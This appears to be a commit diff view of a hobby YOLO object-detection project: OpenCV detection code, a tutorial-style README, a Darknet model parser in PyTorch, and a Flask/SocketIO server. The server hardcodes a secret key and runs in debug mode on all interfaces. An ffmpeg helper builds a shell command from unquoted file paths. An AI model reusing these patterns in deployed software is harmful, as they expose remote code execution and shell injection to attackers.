print("Time took:", time_took)
|
90 |
+
if self.video_file:
|
91 |
+
self.overall_time_taken.append(time_took)
|
92 |
+
time_elapsed = round(sum(self.overall_time_taken),3)
|
93 |
+
approx_finish = self.duration_seconds *4.6 # seconds
|
94 |
+
boxes, confidences, class_ids = [], [], []
|
95 |
+
|
96 |
+
# loop over each of the layer outputs
|
97 |
+
for output in layer_outputs:
|
98 |
+
# loop over each of the object detections
|
99 |
+
for detection in output:
|
100 |
+
# extract the class id (label) and confidence (as a probability) of
|
101 |
+
# the current object detection
|
102 |
+
scores = detection[5:]
|
103 |
+
class_id = np.argmax(scores)
|
104 |
+
confidence = scores[class_id]
|
105 |
+
# discard weak predictions by ensuring the detected
|
106 |
+
# probability is greater than the minimum probability
|
107 |
+
if confidence > self.CONFIDENCE:
|
108 |
+
# scale the bounding box coordinates back relative to the
|
109 |
+
# size of the image, keeping in mind that YOLO actually
|
110 |
+
# returns the center (x, y)-coordinates of the bounding
|
111 |
+
# box followed by the boxes' width and height
|
112 |
+
box = detection[:4] * np.array([w, h, w, h])
|
113 |
+
(centerX, centerY, width, height) = box.astype("int")
|
114 |
+
|
115 |
+
# use the center (x, y)-coordinates to derive the top and
|
116 |
+
# and left corner of the bounding box
|
117 |
+
x = int(centerX - (width / 2))
|
118 |
+
y = int(centerY - (height / 2))
|
119 |
+
|
120 |
+
# update our list of bounding box coordinates, confidences,
|
121 |
+
# and class IDs
|
122 |
+
boxes.append([x, y, int(width), int(height)])
|
123 |
+
confidences.append(float(confidence))
|
124 |
+
class_ids.append(class_id)
|
125 |
+
|
126 |
+
# perform the non maximum suppression given the scores defined before
|
127 |
+
idxs = cv2.dnn.NMSBoxes(boxes, confidences, self.SCORE_THRESHOLD, self.IOU_THRESHOLD)
|
128 |
+
|
129 |
+
self.font_scale = 1
|
130 |
+
self.thickness = 1
|
131 |
+
|
132 |
+
# ensure at least one detection exists
|
133 |
+
if len(idxs) > 0:
|
134 |
+
# loop over the indexes we are keeping
|
135 |
+
for i in idxs.flatten():
|
136 |
+
# extract the bounding box coordinates
|
137 |
+
x, y = boxes[i][0], boxes[i][1]
|
138 |
+
w, h = boxes[i][2], boxes[i][3]
|
139 |
+
# draw a bounding box rectangle and label on the image
|
140 |
+
|
141 |
+
color = [int(c) for c in self.COLORS[class_ids[i]]]
|
142 |
+
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=self.thickness)
|
143 |
+
text = f"{self.LABELS[class_ids[i]]}: {confidences[i]:.2f}"
|
144 |
+
# calculate text width & height to draw the transparent boxes as background of the text
|
145 |
+
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=self.font_scale, thickness=self.thickness)[0]
|
146 |
+
text_offset_x = x
|
147 |
+
text_offset_y = y - 5
|
148 |
+
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
|
149 |
+
overlay = image.copy()
|
150 |
+
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
|
151 |
+
# add opacity (transparency to the box)
|
152 |
+
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
|
153 |
+
# now put the text (label: confidence %)
|
154 |
+
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
|
155 |
+
fontScale=self.font_scale, color=(0, 0, 0), thickness=self.thickness)
|
156 |
+
if self.video_file:
|
157 |
+
self.out.write(image)
|
158 |
+
return image,time_elapsed,approx_finish
|
159 |
+
elif not self.video_file:
|
160 |
+
return image,0,0
|
161 |
+
|
162 |
+
if __name__ == "__main__":
|
163 |
+
def test():
|
164 |
+
caesaryolo = CaesarYolo()
|
165 |
+
caesaryolo.video_load("car-detection.mp4")
|
166 |
+
while True:
|
167 |
+
image,time_elapsed,end_time = caesaryolo.caesar_object_detect("video")
|
168 |
+
if image is not None:
|
169 |
+
print(round(time_elapsed,3),"out of",end_time)
|
170 |
+
cv2.imshow("image", image)
|
171 |
+
|
172 |
+
if ord("q") == cv2.waitKey(1):
|
173 |
+
break
|
174 |
+
else:
|
175 |
+
break
|
176 |
+
|
177 |
+
|
178 |
+
caesaryolo.cap.release()
|
179 |
+
cv2.destroyAllWindows()
|
180 |
+
def convert_avi_to_mp4(avi_file_path, output_name):
|
181 |
+
os.system(f"ffmpeg -y -i {avi_file_path} {output_name}")
|
182 |
+
return True
|
183 |
+
|
184 |
+
CURRENT_DIR = os.path.realpath(__file__).replace(f"/CaesarYolo.py","")
|
185 |
+
#convert_avi_to_mp4(,)
|
186 |
+
import subprocess
|
187 |
+
|
188 |
+
#process = subprocess.Popen(ffmpeg_command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, bufsize = -1)
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
CaesarObjectDetection/README.md
ADDED
@@ -0,0 +1,20 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# [How to Perform YOLO Object Detection using OpenCV and PyTorch in Python](https://www.thepythoncode.com/article/yolo-object-detection-with-opencv-and-pytorch-in-python)
|
2 |
+
To run this:
|
3 |
+
- `pip3 install -r requirements.txt`
|
4 |
+
- Download the [model weights](https://pjreddie.com/media/files/yolov3.weights) and put them in `weights` folder.
|
5 |
+
- To generate a object detection image on `images/dog.jpg`:
|
6 |
+
```
|
7 |
+
python yolo_opencv.py images/dog.jpg
|
8 |
+
```
|
9 |
+
A new image `dog_yolo3.jpg` will appear which has the bounding boxes of different objects in the image.
|
10 |
+
- For live object detection:
|
11 |
+
```
|
12 |
+
python live_yolo_opencv.py
|
13 |
+
```
|
14 |
+
- If you want to read from a video file and make predictions:
|
15 |
+
```
|
16 |
+
python read_video.py video.avi
|
17 |
+
```
|
18 |
+
This will start detecting objects in that video, in the end, it'll save the resulting video to `output.avi`
|
19 |
+
- If you wish to use PyTorch for GPU acceleration, please install PyTorch CUDA [here](https://pytorch.org/get-started) and use `yolo.py` file.
|
20 |
+
- Feel free to edit the codes for your needs!
|
CaesarObjectDetection/__pycache__/CaesarYolo.cpython-37.pyc
ADDED
Binary file (5.87 kB). View file
|
|
CaesarObjectDetection/__pycache__/CaesarYolo.cpython-39.pyc
ADDED
Binary file (3.44 kB). View file
|
|
CaesarObjectDetection/app.py
ADDED
@@ -0,0 +1,42 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
from flask import Flask,request
|
2 |
+
from flask_cors import cross_origin
|
3 |
+
from flask_socketio import SocketIO,send,emit
|
4 |
+
from CaesarYolo import CaesarYolo
|
5 |
+
import numpy as np
|
6 |
+
import base64
|
7 |
+
caesaryolo = CaesarYolo()
|
8 |
+
app = Flask(__name__)
|
9 |
+
app.config['SECRET_KEY'] = 'secret!'
|
10 |
+
socketio = SocketIO(app)
|
11 |
+
|
12 |
+
|
13 |
+
@app.route("/",methods=["GET"])
|
14 |
+
@cross_origin()
|
15 |
+
def caesaraihome():
|
16 |
+
return "Welcome to CaesarAI's API's and CaesarAINL."
|
17 |
+
@app.route("/caesarobjectdetect",methods=["POST"])
|
18 |
+
def caesarobjectdetect():
|
19 |
+
frames = request.get_json()
|
20 |
+
#print(frames)
|
21 |
+
|
22 |
+
image = caesaryolo.caesar_object_detect(np.frombuffer(base64.b64decode(frames["frame"]),dtype="uint8").reshape(480,640,3))#base64.b64decode(frames["frame"]))
|
23 |
+
return {'frame': base64.b64encode(image).decode()}
|
24 |
+
|
25 |
+
@socketio.on('message')
|
26 |
+
def message(data):
|
27 |
+
print(data) # {'from': 'client'}
|
28 |
+
emit('response', {'from': 'server'})
|
29 |
+
|
30 |
+
@socketio.on('man')
|
31 |
+
def message(data):
|
32 |
+
print(data) # {'from': 'client'}
|
33 |
+
emit('response', {'from': 'server man'})
|
34 |
+
@socketio.on('caesarobjectdetect')
|
35 |
+
def caesarobjectdetect(image):
|
36 |
+
image = caesaryolo.caesar_object_detect(np.array(image["frame"]))
|
37 |
+
emit('caesarobjectresponse', {'frame': str(image)})
|
38 |
+
|
39 |
+
if __name__ == "__main__":
|
40 |
+
#port = int(os.environ.get('PORT', 5000)) # 80
|
41 |
+
app.run(debug=True,host="0.0.0.0",port=5000)
|
42 |
+
#socketio.run(app,debug=True,host="0.0.0.0",port=5000)
|
CaesarObjectDetection/cfg/yolov3.cfg
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:39498ec1475dbe57b0308c272d0ce8bd4f3434f70b4a06f59e8a5d6194afdfc6
|
3 |
+
size 8342
|
CaesarObjectDetection/darknet.py
ADDED
@@ -0,0 +1,463 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import torch
|
2 |
+
import torch.nn as nn
|
3 |
+
import numpy as np
|
4 |
+
|
5 |
+
# let us run this cell only if CUDA is available
|
6 |
+
# We will use ``torch.device`` objects to move tensors in and out of GPU
|
7 |
+
if torch.cuda.is_available():
|
8 |
+
x = torch.randn(1)
|
9 |
+
device = torch.device("cuda") # a CUDA device object
|
10 |
+
y = torch.ones_like(x, device=device) # directly create a tensor on GPU
|
11 |
+
x = x.to(device) # or just use strings ``.to("cuda")``
|
12 |
+
z = x + y
|
13 |
+
print(z)
|
14 |
+
print(z.to("cpu", torch.double)) # ``.to`` can also change dtype together!
|
15 |
+
|
16 |
+
|
17 |
+
class YoloLayer(nn.Module):
|
18 |
+
def __init__(self, anchor_mask=[], num_classes=0, anchors=[], num_anchors=1):
|
19 |
+
super(YoloLayer, self).__init__()
|
20 |
+
self.anchor_mask = anchor_mask
|
21 |
+
self.num_classes = num_classes
|
22 |
+
self.anchors = anchors
|
23 |
+
self.num_anchors = num_anchors
|
24 |
+
self.anchor_step = len(anchors)/num_anchors
|
25 |
+
self.coord_scale = 1
|
26 |
+
self.noobject_scale = 1
|
27 |
+
self.object_scale = 5
|
28 |
+
self.class_scale = 1
|
29 |
+
self.thresh = 0.6
|
30 |
+
self.stride = 32
|
31 |
+
self.seen = 0
|
32 |
+
|
33 |
+
def forward(self, output, nms_thresh):
|
34 |
+
self.thresh = nms_thresh
|
35 |
+
masked_anchors = []
|
36 |
+
|
37 |
+
for m in self.anchor_mask:
|
38 |
+
masked_anchors += self.anchors[m*self.anchor_step:(m+1)*self.anchor_step]
|
39 |
+
|
40 |
+
masked_anchors = [anchor/self.stride for anchor in masked_anchors]
|
41 |
+
boxes = get_region_boxes(output.data, self.thresh, self.num_classes, masked_anchors, len(self.anchor_mask))
|
42 |
+
|
43 |
+
return boxes
|
44 |
+
|
45 |
+
|
46 |
+
class Upsample(nn.Module):
|
47 |
+
def __init__(self, stride=2):
|
48 |
+
super(Upsample, self).__init__()
|
49 |
+
self.stride = stride
|
50 |
+
def forward(self, x):
|
51 |
+
stride = self.stride
|
52 |
+
assert(x.data.dim() == 4)
|
53 |
+
B = x.data.size(0)
|
54 |
+
C = x.data.size(1)
|
55 |
+
H = x.data.size(2)
|
56 |
+
W = x.data.size(3)
|
57 |
+
ws = stride
|
58 |
+
hs = stride
|
59 |
+
x = x.view(B, C, H, 1, W, 1).expand(B, C, H, stride, W, stride).contiguous().view(B, C, H*stride, W*stride)
|
60 |
+
return x
|
61 |
+
|
62 |
+
|
63 |
+
#for route and shortcut
|
64 |
+
class EmptyModule(nn.Module):
|
65 |
+
def __init__(self):
|
66 |
+
super(EmptyModule, self).__init__()
|
67 |
+
|
68 |
+
def forward(self, x):
|
69 |
+
return x
|
70 |
+
|
71 |
+
# support route shortcut
|
72 |
+
class Darknet(nn.Module):
|
73 |
+
def __init__(self, cfgfile):
|
74 |
+
super(Darknet, self).__init__()
|
75 |
+
self.blocks = parse_cfg(cfgfile)
|
76 |
+
self.models = self.create_network(self.blocks) # merge conv, bn,leaky
|
77 |
+
self.loss = self.models[len(self.models)-1]
|
78 |
+
|
79 |
+
self.width = int(self.blocks[0]['width'])
|
80 |
+
self.height = int(self.blocks[0]['height'])
|
81 |
+
|
82 |
+
self.header = torch.IntTensor([0,0,0,0])
|
83 |
+
self.seen = 0
|
84 |
+
|
85 |
+
def forward(self, x, nms_thresh):
|
86 |
+
ind = -2
|
87 |
+
self.loss = None
|
88 |
+
outputs = dict()
|
89 |
+
out_boxes = []
|
90 |
+
|
91 |
+
for block in self.blocks:
|
92 |
+
ind = ind + 1
|
93 |
+
if block['type'] == 'net':
|
94 |
+
continue
|
95 |
+
elif block['type'] in ['convolutional', 'upsample']:
|
96 |
+
x = self.models[ind](x)
|
97 |
+
outputs[ind] = x
|
98 |
+
elif block['type'] == 'route':
|
99 |
+
layers = block['layers'].split(',')
|
100 |
+
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
|
101 |
+
if len(layers) == 1:
|
102 |
+
x = outputs[layers[0]]
|
103 |
+
outputs[ind] = x
|
104 |
+
elif len(layers) == 2:
|
105 |
+
x1 = outputs[layers[0]]
|
106 |
+
x2 = outputs[layers[1]]
|
107 |
+
x = torch.cat((x1,x2),1)
|
108 |
+
outputs[ind] = x
|
109 |
+
elif block['type'] == 'shortcut':
|
110 |
+
from_layer = int(block['from'])
|
111 |
+
activation = block['activation']
|
112 |
+
from_layer = from_layer if from_layer > 0 else from_layer + ind
|
113 |
+
x1 = outputs[from_layer]
|
114 |
+
x2 = outputs[ind-1]
|
115 |
+
x = x1 + x2
|
116 |
+
outputs[ind] = x
|
117 |
+
elif block['type'] == 'yolo':
|
118 |
+
boxes = self.models[ind](x, nms_thresh)
|
119 |
+
out_boxes.append(boxes)
|
120 |
+
else:
|
121 |
+
print('unknown type %s' % (block['type']))
|
122 |
+
|
123 |
+
return out_boxes
|
124 |
+
|
125 |
+
|
126 |
+
def print_network(self):
|
127 |
+
print_cfg(self.blocks)
|
128 |
+
|
129 |
+
def create_network(self, blocks):
|
130 |
+
models = nn.ModuleList()
|
131 |
+
|
132 |
+
prev_filters = 3
|
133 |
+
out_filters =[]
|
134 |
+
prev_stride = 1
|
135 |
+
out_strides = []
|
136 |
+
conv_id = 0
|
137 |
+
for block in blocks:
|
138 |
+
if block['type'] == 'net':
|
139 |
+
prev_filters = int(block['channels'])
|
140 |
+
continue
|
141 |
+
elif block['type'] == 'convolutional':
|
142 |
+
conv_id = conv_id + 1
|
143 |
+
batch_normalize = int(block['batch_normalize'])
|
144 |
+
filters = int(block['filters'])
|
145 |
+
kernel_size = int(block['size'])
|
146 |
+
stride = int(block['stride'])
|
147 |
+
is_pad = int(block['pad'])
|
148 |
+
pad = (kernel_size-1)//2 if is_pad else 0
|
149 |
+
activation = block['activation']
|
150 |
+
model = nn.Sequential()
|
151 |
+
if batch_normalize:
|
152 |
+
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad, bias=False))
|
153 |
+
model.add_module('bn{0}'.format(conv_id), nn.BatchNorm2d(filters))
|
154 |
+
else:
|
155 |
+
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad))
|
156 |
+
if activation == 'leaky':
|
157 |
+
model.add_module('leaky{0}'.format(conv_id), nn.LeakyReLU(0.1, inplace=True))
|
158 |
+
prev_filters = filters
|
159 |
+
out_filters.append(prev_filters)
|
160 |
+
prev_stride = stride * prev_stride
|
161 |
+
out_strides.append(prev_stride)
|
162 |
+
models.append(model)
|
163 |
+
elif block['type'] == 'upsample':
|
164 |
+
stride = int(block['stride'])
|
165 |
+
out_filters.append(prev_filters)
|
166 |
+
prev_stride = prev_stride // stride
|
167 |
+
out_strides.append(prev_stride)
|
168 |
+
models.append(Upsample(stride))
|
169 |
+
elif block['type'] == 'route':
|
170 |
+
layers = block['layers'].split(',')
|
171 |
+
ind = len(models)
|
172 |
+
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
|
173 |
+
if len(layers) == 1:
|
174 |
+
prev_filters = out_filters[layers[0]]
|
175 |
+
prev_stride = out_strides[layers[0]]
|
176 |
+
elif len(layers) == 2:
|
177 |
+
assert(layers[0] == ind - 1)
|
178 |
+
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
|
179 |
+
prev_stride = out_strides[layers[0]]
|
180 |
+
out_filters.append(prev_filters)
|
181 |
+
out_strides.append(prev_stride)
|
182 |
+
models.append(EmptyModule())
|
183 |
+
elif block['type'] == 'shortcut':
|
184 |
+
ind = len(models)
|
185 |
+
prev_filters = out_filters[ind-1]
|
186 |
+
out_filters.append(prev_filters)
|
187 |
+
prev_stride = out_strides[ind-1]
|
188 |
+
out_strides.append(prev_stride)
|
189 |
+
models.append(EmptyModule())
|
190 |
+
elif block['type'] == 'yolo':
|
191 |
+
yolo_layer = YoloLayer()
|
192 |
+
anchors = block['anchors'].split(',')
|
193 |
+
anchor_mask = block['mask'].split(',')
|
194 |
+
yolo_layer.anchor_mask = [int(i) for i in anchor_mask]
|
195 |
+
yolo_layer.anchors = [float(i) for i in anchors]
|
196 |
+
yolo_layer.num_classes = int(block['classes'])
|
197 |
+
yolo_layer.num_anchors = int(block['num'])
|
198 |
+
yolo_layer.anchor_step = len(yolo_layer.anchors)//yolo_layer.num_anchors
|
199 |
+
yolo_layer.stride = prev_stride
|
200 |
+
out_filters.append(prev_filters)
|
201 |
+
out_strides.append(prev_stride)
|
202 |
+
models.append(yolo_layer)
|
203 |
+
else:
|
204 |
+
print('unknown type %s' % (block['type']))
|
205 |
+
|
206 |
+
return models
|
207 |
+
|
208 |
+
def load_weights(self, weightfile):
|
209 |
+
print()
|
210 |
+
fp = open(weightfile, 'rb')
|
211 |
+
header = np.fromfile(fp, count=5, dtype=np.int32)
|
212 |
+
self.header = torch.from_numpy(header)
|
213 |
+
self.seen = self.header[3]
|
214 |
+
buf = np.fromfile(fp, dtype = np.float32)
|
215 |
+
fp.close()
|
216 |
+
|
217 |
+
start = 0
|
218 |
+
ind = -2
|
219 |
+
counter = 3
|
220 |
+
for block in self.blocks:
|
221 |
+
if start >= buf.size:
|
222 |
+
break
|
223 |
+
ind = ind + 1
|
224 |
+
if block['type'] == 'net':
|
225 |
+
continue
|
226 |
+
elif block['type'] == 'convolutional':
|
227 |
+
model = self.models[ind]
|
228 |
+
batch_normalize = int(block['batch_normalize'])
|
229 |
+
if batch_normalize:
|
230 |
+
start = load_conv_bn(buf, start, model[0], model[1])
|
231 |
+
else:
|
232 |
+
start = load_conv(buf, start, model[0])
|
233 |
+
elif block['type'] == 'upsample':
|
234 |
+
pass
|
235 |
+
elif block['type'] == 'route':
|
236 |
+
pass
|
237 |
+
elif block['type'] == 'shortcut':
|
238 |
+
pass
|
239 |
+
elif block['type'] == 'yolo':
|
240 |
+
pass
|
241 |
+
else:
|
242 |
+
print('unknown type %s' % (block['type']))
|
243 |
+
|
244 |
+
percent_comp = (counter / len(self.blocks)) * 100
|
245 |
+
|
246 |
+
print('Loading weights. Please Wait...{:.2f}% Complete'.format(percent_comp), end = '\r', flush = True)
|
247 |
+
|
248 |
+
counter += 1
|
249 |
+
|
250 |
+
|
251 |
+
|
252 |
+
def convert2cpu(gpu_matrix):
|
253 |
+
return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)
|
254 |
+
|
255 |
+
|
256 |
+
def convert2cpu_long(gpu_matrix):
|
257 |
+
return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)
|
258 |
+
|
259 |
+
|
260 |
+
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness = 1, validation = False):
|
261 |
+
anchor_step = len(anchors)//num_anchors
|
262 |
+
if output.dim() == 3:
|
263 |
+
output = output.unsqueeze(0)
|
264 |
+
batch = output.size(0)
|
265 |
+
assert(output.size(1) == (5+num_classes)*num_anchors)
|
266 |
+
h = output.size(2)
|
267 |
+
w = output.size(3)
|
268 |
+
|
269 |
+
all_boxes = []
|
270 |
+
output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)
|
271 |
+
|
272 |
+
grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
|
273 |
+
grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
|
274 |
+
xs = torch.sigmoid(output[0]) + grid_x
|
275 |
+
ys = torch.sigmoid(output[1]) + grid_y
|
276 |
+
|
277 |
+
anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
|
278 |
+
anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
|
279 |
+
anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
|
280 |
+
anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
|
281 |
+
ws = torch.exp(output[2]) * anchor_w
|
282 |
+
hs = torch.exp(output[3]) * anchor_h
|
283 |
+
|
284 |
+
det_confs = torch.sigmoid(output[4])
|
285 |
+
cls_confs = torch.nn.Softmax(dim=1)(output[5:5+num_classes].transpose(0,1)).detach()
|
286 |
+
cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
|
287 |
+
cls_max_confs = cls_max_confs.view(-1)
|
288 |
+
cls_max_ids = cls_max_ids.view(-1)
|
289 |
+
|
290 |
+
|
291 |
+
sz_hw = h*w
|
292 |
+
sz_hwa = sz_hw*num_anchors
|
293 |
+
det_confs = convert2cpu(det_confs)
|
294 |
+
cls_max_confs = convert2cpu(cls_max_confs)
|
295 |
+
cls_max_ids = convert2cpu_long(cls_max_ids)
|
296 |
+
xs = convert2cpu(xs)
|
297 |
+
ys = convert2cpu(ys)
|
298 |
+
ws = convert2cpu(ws)
|
299 |
+
hs = convert2cpu(hs)
|
300 |
+
if validation:
|
301 |
+
cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
|
302 |
+
|
303 |
+
for b in range(batch):
|
304 |
+
boxes = []
|
305 |
+
for cy in range(h):
|
306 |
+
for cx in range(w):
|
307 |
+
for i in range(num_anchors):
|
308 |
+
ind = b*sz_hwa + i*sz_hw + cy*w + cx
|
309 |
+
det_conf = det_confs[ind]
|
310 |
+
if only_objectness:
|
311 |
+
conf = det_confs[ind]
|
312 |
+
else:
|
313 |
+
conf = det_confs[ind] * cls_max_confs[ind]
|
314 |
+
|
315 |
+
if conf > conf_thresh:
|
316 |
+
bcx = xs[ind]
|
317 |
+
bcy = ys[ind]
|
318 |
+
bw = ws[ind]
|
319 |
+
bh = hs[ind]
|
320 |
+
cls_max_conf = cls_max_confs[ind]
|
321 |
+
cls_max_id = cls_max_ids[ind]
|
322 |
+
box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
|
323 |
+
if (not only_objectness) and validation:
|
324 |
+
for c in range(num_classes):
|
325 |
+
tmp_conf = cls_confs[ind][c]
|
326 |
+
if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
|
327 |
+
box.append(tmp_conf)
|
328 |
+
box.append(c)
|
329 |
+
boxes.append(box)
|
330 |
+
all_boxes.append(boxes)
|
331 |
+
|
332 |
+
return all_boxes
|
333 |
+
|
334 |
+
|
335 |
+
def parse_cfg(cfgfile):
|
336 |
+
blocks = []
|
337 |
+
fp = open(cfgfile, 'r')
|
338 |
+
block = None
|
339 |
+
line = fp.readline()
|
340 |
+
while line != '':
|
341 |
+
line = line.rstrip()
|
342 |
+
if line == '' or line[0] == '#':
|
343 |
+
line = fp.readline()
|
344 |
+
continue
|
345 |
+
elif line[0] == '[':
|
346 |
+
if block:
|
347 |
+
blocks.append(block)
|
348 |
+
block = dict()
|
349 |
+
block['type'] = line.lstrip('[').rstrip(']')
|
350 |
+
# set default value
|
351 |
+
if block['type'] == 'convolutional':
|
352 |
+
block['batch_normalize'] = 0
|
353 |
+
else:
|
354 |
+
key,value = line.split('=')
|
355 |
+
key = key.strip()
|
356 |
+
if key == 'type':
|
357 |
+
key = '_type'
|
358 |
+
value = value.strip()
|
359 |
+
block[key] = value
|
360 |
+
line = fp.readline()
|
361 |
+
|
362 |
+
if block:
|
363 |
+
blocks.append(block)
|
364 |
+
fp.close()
|
365 |
+
return blocks
|
366 |
+
|
367 |
+
|
368 |
+
def print_cfg(blocks):
|
369 |
+
print('layer filters size input output')
|
370 |
+
prev_width = 416
|
371 |
+
prev_height = 416
|
372 |
+
prev_filters = 3
|
373 |
+
out_filters =[]
|
374 |
+
out_widths =[]
|
375 |
+
out_heights =[]
|
376 |
+
ind = -2
|
377 |
+
for block in blocks:
|
378 |
+
ind = ind + 1
|
379 |
+
if block['type'] == 'net':
|
380 |
+
prev_width = int(block['width'])
|
381 |
+
prev_height = int(block['height'])
|
382 |
+
continue
|
383 |
+
elif block['type'] == 'convolutional':
|
384 |
+
filters = int(block['filters'])
|
385 |
+
kernel_size = int(block['size'])
|
386 |
+
stride = int(block['stride'])
|
387 |
+
is_pad = int(block['pad'])
|
388 |
+
pad = (kernel_size-1)//2 if is_pad else 0
|
389 |
+
width = (prev_width + 2*pad - kernel_size)//stride + 1
|
390 |
+
height = (prev_height + 2*pad - kernel_size)//stride + 1
|
391 |
+
print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
|
392 |
+
prev_width = width
|
393 |
+
prev_height = height
|
394 |
+
prev_filters = filters
|
395 |
+
out_widths.append(prev_width)
|
396 |
+
out_heights.append(prev_height)
|
397 |
+
